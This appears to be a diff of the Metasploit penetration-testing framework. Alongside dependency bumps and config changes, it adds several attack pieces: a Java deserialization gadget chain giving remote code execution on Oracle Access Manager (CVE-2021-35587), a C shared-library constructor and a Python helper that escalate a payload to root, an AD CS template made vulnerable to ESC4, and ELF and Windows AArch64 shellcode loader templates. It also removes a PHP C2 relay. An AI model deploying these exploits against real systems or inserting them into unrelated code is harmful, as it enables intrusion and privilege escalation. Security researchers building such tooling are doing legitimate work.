+lru_redux, 1.1.0, MIT
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 5.0.3, "New BSD"
-metasploit-credential, 6.0.11, "New BSD"
-metasploit-framework, 6.4.41, "New BSD"
-metasploit-model, 5.0.2, "New BSD"
-metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.5, "New BSD"
-metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
+metasploit-concern, 5.0.5, "New BSD"
+metasploit-credential, 6.0.16, "New BSD"
+metasploit-framework, 6.4.79, "New BSD"
+metasploit-model, 5.0.4, "New BSD"
+metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 6.0.9, "New BSD"
+metasploit_payloads-mettle, 1.0.42, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
 mime-types, 3.6.0, MIT
-mime-types-data, 3.2024.1001, MIT
-mini_portile2, 2.8.7, MIT
-minitest, 5.25.1, MIT
+mime-types-data, 3.2025.0304, MIT
+mini_portile2, 2.8.9, MIT
+minitest, 5.25.5, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.3, MIT
-mutex_m, 0.2.0, "ruby, Simplified BSD"
+mutex_m, 0.3.0, "ruby, Simplified BSD"
 nessus_rest, 0.1.6, MIT
-net-imap, 0.5.0, "ruby, Simplified BSD"
+net-imap, 0.5.6, "ruby, Simplified BSD"
 net-ldap, 0.19.0, MIT
 net-protocol, 0.2.2, "ruby, Simplified BSD"
 net-sftp, 4.0.0, MIT
-net-smtp, 0.5.0, "ruby, Simplified BSD"
+net-smtp, 0.5.1, "ruby, Simplified BSD"
 net-ssh, 7.3.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.16.7, MIT
+nokogiri, 1.18.9, MIT
 nori, 2.7.1, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
+ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
-parallel, 1.26.3, MIT
-parser, 3.3.5.0, MIT
+parallel, 1.27.0, MIT
+parser, 3.3.8.0, MIT
+parslet, 1.8.2, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
-pdf-reader, 2.12.0, MIT
+pdf-reader, 2.14.1, MIT
 pg, 1.5.9, "Simplified BSD"
+pp, 0.6.2, "ruby, Simplified BSD"
+prettyprint, 0.2.0, "ruby, Simplified BSD"
+prism, 1.4.0, MIT
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
+psych, 5.2.6, MIT
 public_suffix, 6.0.1, MIT
-puma, 6.4.3, "New BSD"
+puma, 6.6.0, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.10, MIT
+rack, 2.2.17, MIT
 rack-protection, 3.2.0, MIT
-rack-test, 2.1.0, MIT
-rails-dom-testing, 2.2.0, MIT
-rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.8.6, MIT
+rack-session, 1.0.2, MIT
+rack-test, 2.2.0, MIT
+rackup, 1.0.1, MIT
+rails-dom-testing, 2.3.0, MIT
+rails-html-sanitizer, 1.6.2, MIT
+railties, 7.2.2.1, MIT
 rainbow, 3.1.1, MIT
-rake, 13.2.1, MIT
-rasn1, 0.13.0, MIT
+rake, 13.3.0, MIT
+rasn1, 0.14.0, MIT
 rb-readline, 0.5.5, BSD
-recog, 3.1.11, unknown
-redcarpet, 3.6.0, MIT
-regexp_parser, 2.9.2, MIT
-reline, 0.5.10, ruby
+rdoc, 6.14.2, ruby
+recog, 3.1.14, unknown
+redcarpet, 3.6.1, MIT
+regexp_parser, 2.10.0, MIT
+reline, 0.6.2, ruby
 require_all, 3.0.0, MIT
-rex-arch, 0.1.16, "New BSD"
-rex-bin_tools, 0.1.9, "New BSD"
-rex-core, 0.1.32, "New BSD"
-rex-encoder, 0.1.7, "New BSD"
-rex-exploitation, 0.1.40, "New BSD"
-rex-java, 0.1.7, "New BSD"
-rex-mime, 0.1.8, "New BSD"
-rex-nop, 0.1.3, "New BSD"
-rex-ole, 0.1.8, "New BSD"
-rex-powershell, 0.1.100, "New BSD"
-rex-random_identifier, 0.1.13, "New BSD"
-rex-registry, 0.1.5, "New BSD"
-rex-rop_builder, 0.1.5, "New BSD"
-rex-socket, 0.1.57, "New BSD"
-rex-sslscan, 0.1.10, "New BSD"
-rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.59, "New BSD"
-rex-zip, 0.1.5, "New BSD"
-rexml, 3.3.9, "Simplified BSD"
+rex-arch, 0.1.18, "New BSD"
+rex-bin_tools, 0.1.10, "New BSD"
+rex-core, 0.1.34, "New BSD"
+rex-encoder, 0.1.8, "New BSD"
+rex-exploitation, 0.1.41, "New BSD"
+rex-java, 0.1.8, "New BSD"
+rex-mime, 0.1.11, "New BSD"
+rex-nop, 0.1.4, "New BSD"
+rex-ole, 0.1.9, "New BSD"
+rex-powershell, 0.1.101, "New BSD"
+rex-random_identifier, 0.1.16, "New BSD"
+rex-registry, 0.1.6, "New BSD"
+rex-rop_builder, 0.1.6, "New BSD"
+rex-socket, 0.1.62, "New BSD"
+rex-sslscan, 0.1.13, "New BSD"
+rex-struct2, 0.1.5, "New BSD"
+rex-text, 0.2.61, "New BSD"
+rex-zip, 0.1.6, "New BSD"
+rexml, 3.4.1, "Simplified BSD"
+rinda, 0.2.0, "ruby, Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.13.0, MIT
-rspec-core, 3.13.2, MIT
-rspec-expectations, 3.13.3, MIT
-rspec-mocks, 3.13.2, MIT
-rspec-rails, 7.0.1, MIT
+rspec-core, 3.13.5, MIT
+rspec-expectations, 3.13.5, MIT
+rspec-mocks, 3.13.5, MIT
+rspec-rails, 8.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.1, MIT
-rubocop, 1.67.0, MIT
-rubocop-ast, 1.33.0, MIT
+rspec-support, 3.13.4, MIT
+rubocop, 1.75.7, MIT
+rubocop-ast, 1.44.1, MIT
 ruby-macho, 4.1.0, MIT
-ruby-mysql, 4.1.0, MIT
-ruby-prof, 1.4.2, "Simplified BSD"
+ruby-mysql, 4.2.0, MIT
+ruby-prof, 1.7.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.13, "New BSD"
+ruby_smb, 3.3.15, "New BSD"
 rubyntlm, 0.6.5, MIT
-rubyzip, 2.3.2, "Simplified BSD"
+rubyzip, 2.4.1, "Simplified BSD"
 sawyer, 0.9.2, MIT
+securerandom, 0.4.1, "ruby, Simplified BSD"
 simplecov, 0.18.2, MIT
 simplecov-html, 0.13.1, MIT
 simpleidn, 0.2.3, MIT
 sinatra, 3.2.0, MIT
 sqlite3, 1.7.3, "New BSD"
 sshkey, 3.0.0, MIT
+stringio, 3.1.1, "ruby, Simplified BSD"
 strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
-systemu, 2.6.5, ruby
-test-prof, 1.4.2, MIT
+syslog, 0.3.0, "ruby, Simplified BSD"
+test-prof, 1.4.4, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.3.2, MIT
-tilt, 2.4.0, MIT
+thor, 1.4.0, MIT
+tilt, 2.6.0, MIT
 timecop, 0.9.10, MIT
-timeout, 0.4.1, "ruby, Simplified BSD"
+timeout, 0.4.3, "ruby, Simplified BSD"
+toml, 0.2.0, MIT
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2024.2, MIT
-unicode-display_width, 2.6.0, MIT
+tzinfo-data, 1.2025.1, MIT
+unicode-display_width, 3.1.4, MIT
+unicode-emoji, 4.0.4, MIT
 unix-crypt, 1.3.1, 0BSD
-uuid, 2.3.9, MIT
+useragent, 0.16.11, MIT
 warden, 1.2.9, MIT
-webrick, 1.8.2, "ruby, Simplified BSD"
-websocket-driver, 0.7.6, "Apache 2.0"
+webrick, 1.9.1, "ruby, Simplified BSD"
+websocket-driver, 0.7.7, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
 windows_error, 0.1.5, BSD
 winrm, 2.3.9, "Apache 2.0"
+with_env, 1.1.0, MIT
 xdr, 3.0.3, "Apache 2.0"
+xml-simple, 1.1.9, MIT
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
 yard, 0.9.37, MIT
-zeitwerk, 2.6.18, MIT
+zeitwerk, 2.7.3, MIT
@@ -41,18 +41,9 @@ module Metasploit
      config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
      config.autoloader = :zeitwerk

-      case Rails.env
-      when "development"
-        config.eager_load = false
-      when "test"
-        config.eager_load = false
-      when "production"
-        config.eager_load = false
-      end
+      config.load_defaults 7.2

-      if ActiveRecord.respond_to?(:legacy_connection_handling=)
-        ActiveRecord.legacy_connection_handling = false
-      end
+      config.eager_load = false
    end
  end
 end
@@ -10,6 +10,8 @@ info:
  x-cortex-type: service
  x-cortex-domain-parents:
  - tag: metasploit
+  x-cortex-groups:
+  - exposure:external-ship
 openapi: 3.0.1
 servers:
 - url: "/"
@@ -0,0 +1,30 @@
+---
+# Creates a template that will be vulnerable to ESC4 (certificate has weak edit permissions).
+# Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users (this is what makes the template vulnerable to ESC4)
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: 0
+pKICriticalExtensions:
+  - 2.5.29.19
+  - 2.5.29.15
+pKIExtendedKeyUsage:
+# Server Authentication OID (Not necessary although if left blank this template would also be vulnerable to ESC2)
+  - 1.3.6.1.5.5.7.3.1
+pKIExpirationPeriod: !binary |-
+  AEAepOhl+v8=
+pKIOverlapPeriod: !binary |-
+  AICmCv/e//8=
+pKIDefaultCSPs: 1,Microsoft Enhanced Cryptographic Provider v1.0
+msPKI-RA-Signature: 0
+msPKI-Enrollment-Flag: 0
+# CT_FLAG_EXPORTABLE_KEY
+msPKI-Private-Key-Flag: 0x10
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
+msPKI-Minimal-Key-Size: 2048
@@ -249,7 +249,7 @@ queries:
      - https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
      - https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
  - action: ENUM_LAPS_PASSWORDS
-    description: 'Dump info about computers that have LAPS enabled, and passwords for them if available.'
+    description: 'Dump info about computers that have LAPS v1 enabled, and passwords for them if available.'
    filter: '(ms-MCS-AdmPwd=*)'
    attributes:
      - cn
@@ -387,3 +387,12 @@ queries:
    references:
      - https://www.thehacker.recipes/ad/movement/builtins/pre-windows-2000-computers
      - https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
+  - action: ENUM_SCCM_MANAGEMENT_POINTS
+    description: 'Find all registered SCCM/MECM management points'
+    filter: '(objectclass=mssmsmanagementpoint)'
+    attributes:
+      - cn
+      - dNSHostname
+      - msSMSSiteCode
+    references:
+      - https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/RECON/RECON-1/recon-1_description.md
@@ -13,4 +13,4 @@ responsible for corrupting the Metasploit Framework installation.

 For more information about EICAR, please see the following web site:

-http://www.eicar.org/anti_virus_test_file.htm
+https://www.eicar.org/download-anti-malware-testfile/
@@ -0,0 +1,136 @@
+// This gadget chain targets Oracle Access Manager on WebLogic (CVE-2021-35587) and is based upon:
+// * Y4er: https://github.com/Y4er/CVE-2020-2883/blob/master/CVE_2020_2883.java
+// * Jang: https://twitter.com/testanull/status/1502114473989279744
+//
+// Tested against Oracle Access Manager version:
+// * 12.2.1.4.0
+// * 12.2.1.3.0
+//
+// Note: The classes used in this chain do not have a serialVersionUID explicitly defined, so the JVM will compute one.
+// This has the effect that if the class changes between versions, the computed serialVersionUID will differ between
+// versions. As such we need to account for this, and generate the gadget for the different versions.
+//
+// We collect these JAR files from the OAM install (actually part of the WebLogic application server).
+// $ sha1sum **/*
+// 6de9309c3bcbc0478da85a8f60325c4ee5419cf1  12.2.1.3.0/coherence.jar
+// d58cf115884e1ae76fb0e7b8e022f7447af63a66  12.2.1.3.0/com.bea.core.weblogic.rmi.client.jar
+// ba45c235668885dff671eff34ee1b6ca57aefa6a  12.2.1.4.0/coherence.jar
+// d3f2e0778774123ae19654ad0960600bddf79389  12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar
+//
+// We can see the serialVersionUID changes for the classes in coherence.jar, for example:
+// $ serialver -classpath 12.2.1.3.0/coherence.jar com.tangosol.util.comparator.ExtractorComparator
+// com.tangosol.util.comparator.ExtractorComparator:    private static final long serialVersionUID = -339238653537079588L;
+// $ serialver -classpath 12.2.1.4.0/coherence.jar com.tangosol.util.comparator.ExtractorComparator
+// com.tangosol.util.comparator.ExtractorComparator:    private static final long serialVersionUID = -453812047863165663L;
+//
+// We can see the serialVersionUID does not change for BasicServiceContext:
+// $ serialver -classpath 12.2.1.3.0/com.bea.core.weblogic.rmi.client.jar weblogic.rmi.provider.BasicServiceContext
+// weblogic.rmi.provider.BasicServiceContext:    private static final long serialVersionUID = -1989708991725000930L;
+// $ serialver -classpath 12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar weblogic.rmi.provider.BasicServiceContext
+// weblogic.rmi.provider.BasicServiceContext:    private static final long serialVersionUID = -1989708991725000930L;
+//
+// Compile with:
+// $ javac -cp 12.2.1.4.0/coherence.jar:12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar gadget.java
+//
+// Run with:
+// $ java --add-opens java.base/java.util=ALL-UNNAMED -cp 12.2.1.4.0/coherence.jar:12.2.1.4.0/com.bea.core.weblogic.rmi.client.jar:. gadget
+//
+// Save the output for that version:
+// $ mv gadget.bin gadget_12.2.1.4.0.bin
+//
+// We then get the following gadget chains:
+// $ sha1sum *.bin
+// 1326ef6fe634e2e2bb83705507d766efbfcfc141  gadget_12.2.1.3.0.bin
+// fad1e1e243dd9aca09658893737341008ef27096  gadget_12.2.1.4.0.bin
+import java.io.*;
+import java.lang.reflect.Field;
+import java.util.PriorityQueue;
+
+// coherence.jar
+import com.tangosol.util.ValueExtractor;
+import com.tangosol.util.comparator.ExtractorComparator;
+import com.tangosol.util.extractor.ChainedExtractor;
+import com.tangosol.util.extractor.ReflectionExtractor;
+
+// com.bea.core.weblogic.rmi.client.jar
+import weblogic.rmi.provider.BasicServiceContext;
+
+public class gadget {
+
+    public static void main(String[] args) throws Exception
+    {
+        ReflectionExtractor reflectionExtractor1 = new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[]{}});
+        ReflectionExtractor reflectionExtractor2 = new ReflectionExtractor("invoke", new Object[]{null, new Object[]{}});
+        ReflectionExtractor reflectionExtractor3 = new ReflectionExtractor("exec", new Object[]{new String[]{"EXEC_ARG0", "EXEC_ARG1", "EXEC_ARG2"}});
+
+        ValueExtractor[] valueExtractors = new ValueExtractor[]{
+                reflectionExtractor1,
+                reflectionExtractor2,
+                reflectionExtractor3,
+        };
+
+        Class clazz = ChainedExtractor.class.getSuperclass();
+        Field m_aExtractor = clazz.getDeclaredField("m_aExtractor");
+        m_aExtractor.setAccessible(true);
+
+        ReflectionExtractor reflectionExtractor = new ReflectionExtractor("toString", new Object[]{});
+        ValueExtractor[] valueExtractors1 = new ValueExtractor[]{
+                reflectionExtractor
+        };
+
+        ChainedExtractor chainedExtractor1 = new ChainedExtractor(valueExtractors1);
+
+        PriorityQueue queue = new PriorityQueue(2, new ExtractorComparator(chainedExtractor1));
+        queue.add("1");
+        queue.add("1");
+        m_aExtractor.set(chainedExtractor1, valueExtractors);
+
+        Field field = PriorityQueue.class.getDeclaredField("queue");
+        field.setAccessible(true);
+
+        Object[] queueArray = (Object[]) field.get(queue);
+
+        queueArray[0] = Runtime.class;
+        queueArray[1] = "1";
+
+        BasicServiceContext bsc = new BasicServiceContext(1, queue, false);
+
+        byte[] bytes = serialize(bsc);
+        StringBuilder sb = new StringBuilder();
+        for (byte b : bytes) {
+            sb.append(String.format("%02x", b));
+        }
+        System.out.println(sb.toString());
+
+		FileOutputStream fos = new FileOutputStream("gadget.bin");
+		ObjectOutputStream os = new ObjectOutputStream(fos);
+		os.writeObject(bsc);
+		os.close();
+
+        //deserialize(bytes);
+    }
+
+    public static byte[] serialize(final Object obj) throws IOException {
+        final ByteArrayOutputStream out = new ByteArrayOutputStream();
+        serialize(obj, out);
+        return out.toByteArray();
+    }
+
+    public static void serialize(final Object obj, final OutputStream out) throws IOException {
+        final ObjectOutputStream objOut = new ObjectOutputStream(out);
+        objOut.writeObject(obj);
+        objOut.flush();
+        objOut.close();
+    }
+
+    public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
+        final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
+        return deserialize(in);
+    }
+
+    public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
+        final ObjectInputStream objIn = new ObjectInputStream(in);
+        return objIn.readObject();
+    }
+
+}
@@ -0,0 +1,27 @@
+/*
+// system call
+#include <stdlib.h>
+// setuid, setgid
+#include <unistd.h>
+
+static void a() __attribute__((constructor));
+
+void a() {
+  setuid(0);
+  setgid(0);
+  const char *shell = "chown root:root PAYLOAD_PATH; chmod a+x PAYLOAD_PATH; chmod u+s PAYLOAD_PATH &";
+  system(shell);
+}
+*/
+
+extern int setuid(int);
+extern int setgid(int);
+extern int system(const char *__s);
+
+void a(void) __attribute__((constructor));
+
+void __attribute__((constructor)) a() {
+  setuid(0);
+  setgid(0);
+  system("chown root:root 'PAYLOAD_PATH'; chmod a+x,u+s 'PAYLOAD_PATH'");
+}
@@ -0,0 +1,17 @@
+import os
+import time
+import pwd
+
+print("#########################\n\nDont mind the error message above\n\nWaiting for needrestart to run...")
+
+while True:
+    try:
+        file_stat = os.stat('PAYLOAD_PATH')
+    except FileNotFoundError:
+        exit()
+    username = pwd.getpwuid(file_stat.st_uid).pw_name
+    #print(f"Payload owned by: {username}. Stats: {file_stat}")
+    if (username == 'root'):
+        os.system('PAYLOAD_PATH &')
+        exit()
+    time.sleep(1)
@@ -185,19 +185,19 @@ class SnifferSMB < BaseProtocolParser
              report_note(
                :host  => src_ip,
                :type  => "smb_peer_os",
-                :data  => s[:peer_os]
+                :data  => { :peer_os => s[:peer_os] }
              ) if (s[:peer_os] and s[:peer_os].strip.length > 0)

              report_note(
                :host  => src_ip,
                :type  => "smb_peer_lm",
-                :data  => s[:peer_lm]
+                :data  => { :peer_lm => s[:peer_lm] }
              ) if (s[:peer_lm] and s[:peer_lm].strip.length > 0)

              report_note(
                :host  => src_ip,
                :type  => "smb_domain",
-                :data  => s[:domain]
+                :data  => { :domain => s[:domain] }
              ) if (s[:domain] and s[:domain].strip.length > 0)

            end
@@ -67,6 +67,8 @@
 <% description = "Module may cause a noise (Examples: audio output from the speakers or hardware beeps)." %>
 <% elsif side_effect == "physical-effects" %>
 <% description = "Module may produce physical effects (Examples: the device makes movement or flashes LEDs)." %>
+<% elsif side_effect == "unknown-side-effects" %>
+<% description = "Module side effects are unknown." %>
 <% end %>

 * **<%= side_effect %>:** <%= description %>
@@ -85,6 +87,8 @@
 <% description = "The module isn't expected to get a shell reliably (such as only once)." %>
 <% elsif reliability == "event-dependent" %>
 <% description = "The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc." %>
+<% elsif reliability == "unknown-reliability" %>
+<% description = "Module reliability is unknown." %>
 <% end %>

 * **<%= reliability %>:** <%= description %>
@@ -109,6 +113,8 @@
 <% description = "Module may cause a resource (such as a file or data in a database) to be unavailable for the service." %>
 <% elsif stability == "os-resource-loss" %>
 <% description = "Modules may cause a resource (such as a file) to be unavailable for the OS." %>
+<% elsif stability == "unknown-stability" %>
+<% description = "Module stability is unknown." %>
 <% end %>

 * **<%= stability %>:** <%= description %>
@@ -1,68 +0,0 @@
-<?php
-$magic = 'TzGq';
-$tempdir = sys_get_temp_dir() . "/hop" . $magic;
-if(!is_dir($tempdir)){
-	mkdir($tempdir); //make sure it's there
-}
-
-//get url
-$url = $_SERVER["QUERY_STRING"];
-//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
-
-//Looks for a file with a name or contents prefix, if found, send it and deletes it
-function findSendDelete($tempdir, $prefix, $one=true){
-	if($dh = opendir($tempdir)){
-		while(($file = readdir($dh)) !== false){
-			if(strpos($file, $prefix) !== 0){
-				continue;
-			}
-			readfile($tempdir."/".$file);
-			unlink($tempdir."/".$file);
-			if($one){
-				break;
-			}
-		}
-	}
-}
-
-//handle control
-if($url === "/control"){
-	if($_SERVER['REQUEST_METHOD'] === 'POST'){
-		//handle data for payload - save in a "down" file or the "init" file
-		$postdata = file_get_contents("php://input");
-		if(array_key_exists('HTTP_X_INIT', $_SERVER)){
-			$f = fopen($tempdir."/init", "w"); //only one init file
-		}else{
-			$prefix = "down_" . sha1($_SERVER['HTTP_X_URLFRAG']);
-			$f = fopen(tempnam($tempdir,$prefix), "w");
-		}
-		fwrite($f, $postdata);
-		fclose($f);
-	}else{
-		findSendDelete($tempdir, "up_", false);
-	}
-}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
-	//get data
-	$postdata = file_get_contents("php://input");
-	//See if we should send anything down
-	if($postdata === "RECV\x00" || $postdata === "RECV"){
-		findSendDelete($tempdir, "down_" . sha1($url));
-		$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
-	}else{
-		$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
-	}
-	//find free and write new file
-	$f = fopen($fname, "w");
-	fwrite($f, $magic);
-	//Little-endian pack length and data
-	$urlen = strlen($url);
-	fwrite($f, pack('V', $urlen));
-	fwrite($f, $url);
-	$postdatalen = strlen($postdata);
-	fwrite($f, pack('V', $postdatalen));
-	fwrite($f, $postdata);
-	fclose($f);
-//Initial query will be a GET and have a 12345 in it
-}else if(strpos($url, "12345") !== FALSE){
-	readfile($tempdir."/init");
-}
@@ -9,7 +9,7 @@ ehdr:                            ; Elf32_Ehdr
  db    0, 0, 0, 0,  0, 0, 0, 0  ;
  dw    2                        ;   e_type       = ET_EXEC for an executable
  dw    0xB7                     ;   e_machine    = AARCH64
-  dd    0                        ;   e_version
+  dd    1                        ;   e_version
  dq    _start                   ;   e_entry
  dq    phdr - $$                ;   e_phoff
  dq    0                        ;   e_shoff
@@ -0,0 +1,35 @@
+BITS 64
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 2, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    0x0200                   ;   e_type       = ET_EXEC for an executable
+  dw    0x1500                   ;   e_machine    = PPC64
+  dd    0x01000000                        ;   e_version
+  dq    0x7810000000000000      ;   e_entry
+  dq    0x4000000000000000       ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    0x4000                   ;   e_ehsize
+  dw    0x3800                   ;   e_phentsize
+  dw    0x0100                   ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+
+  dd    0x01000000               ;   p_type       = pt_load
+  dd    0x07000000               ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    0x0010000000000000       ;   p_vaddr
+  dq    0x0010000000000000                       ;   p_paddr
+  dq    0xefbeadde       ;   p_filesz
+  dq    0xefbeadde       ;   p_memsz
+  dq    0x0000100000000000      ;   p_align
+
+phdrsize equ  $ - phdr
+
+_start:
+dq      0x8010000000000000
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_x64_template.s -f bin -o template_x64_linux.bin
+
+BITS 64
+
+org 0x0000000000400000
+
+ehdr:                            ; Elf64_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0x3e                     ;   e_machine
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf64_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0x4141414141414141       ;   p_filesz
+  dq    0x4242424242424242       ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -0,0 +1,98 @@
+;
+; A minimal AArch64 PE template for Metasploit shellcode
+; Author: Alexander 'xaitax' Hagenah
+;
+; --- Compilation (Microsoft Visual Studio Build Tools) ---
+; 1. Assemble:
+;    armasm64.exe -o template_aarch64_windows.obj template_aarch64_windows.asm
+;
+; 2. Link:
+;    LINK.exe template_aarch64_windows.obj /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe
+;
+;
+; --- Cross Compilation (Microsoft Visual Studio Build Tools) ---
+; 1. Locate Cross Compiler Tools and Libraries
+;     In this case: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\
+;     And: C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm64
+; 2. Assemble:
+;    "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\armasm64.exe" -o template_aarch64_windows.obj template_aarch64_windows.asm
+; 3. Link:
+;    "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.44.35207\bin\Hostx64\arm64\link.exe"  template_aarch64_windows.obj /LIBPATH:"C:\Program Files (x86)\Windows Kits\10\Lib\10.0.26100.0\um\arm64" /MACHINE:ARM64 /SUBSYSTEM:WINDOWS /ENTRY:main /NODEFAULTLIB kernel32.lib /OUT:template_aarch64_windows.exe
+        AREA    |.text|, CODE, READONLY
+
+; Import the Win32 functions we need from kernel32.dll
+        IMPORT  VirtualAlloc
+        IMPORT  VirtualProtect
+        IMPORT  ExitProcess
+
+; Define constants for Win32 API calls
+SCSIZE          EQU     4096
+MEM_COMMIT      EQU     0x1000
+PAGE_READWRITE  EQU     0x04
+PAGE_EXECUTE    EQU     0x10
+
+; Export the entry point of our program
+        EXPORT main
+
+main
+        ; Allocate space on the stack for the oldProtection variable (DWORD)
+        sub     sp, sp, #16
+        
+        ; --- 1. Allocate executable memory ---
+        ; hfRet = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT, PAGE_READWRITE);
+        mov     x0, #0
+        mov     x1, #SCSIZE
+        mov     x2, #MEM_COMMIT
+        mov     x3, #PAGE_READWRITE
+        ldr     x8, =VirtualAlloc
+        blr     x8
+
+        ; Check if VirtualAlloc failed. If so, exit.
+        cbz     x0, exit_fail
+
+        ; Save the pointer to our new executable buffer in a non-volatile register
+        mov     x19, x0
+
+        ; --- 2. Copy the payload into the new buffer ---
+        ; This is a simple memcpy(dest, src, size)
+        mov     x0, x19                 ; x0 = dest = our new buffer
+        ldr     x1, =payload_buffer     ; x1 = src = the payload in our .data section
+        mov     x2, #SCSIZE             ; x2 = count
+copy_loop
+        ldrb    w3, [x1], #1            ; Load byte from src, increment src pointer
+        strb    w3, [x0], #1            ; Store byte to dest, increment dest pointer
+        subs    x2, x2, #1              ; Decrement counter
+        b.ne    copy_loop               ; Loop if not zero
+
+        ; --- 3. Change memory permissions to executable ---
+        ; VirtualProtect(hfRet, SCSIZE, PAGE_EXECUTE, &dwOldProtect);
+        mov     x0, x19                 ; x0 = buffer address
+        mov     x1, #SCSIZE             ; x1 = size
+        mov     x2, #PAGE_EXECUTE       ; x2 = new protection
+        mov     x3, sp                  ; x3 = pointer to oldProtection on the stack
+        ldr     x8, =VirtualProtect
+        blr     x8
+
+        ; --- 4. Execute the payload ---
+        ; Jump to the shellcode we just copied and protected.
+        blr     x19
+
+exit_success
+        ; Shellcode returned, or we are done. Exit cleanly.
+        mov     x0, #0                  ; Exit code 0
+        ldr     x8, =ExitProcess
+        blr     x8
+        
+exit_fail
+        ; Something went wrong. Exit with code 1.
+        mov     x0, #1
+        ldr     x8, =ExitProcess
+        blr     x8
+
+; The data section where the payload will be located.
+; The 'PAYLOAD:' tag must be at the very beginning of this buffer.
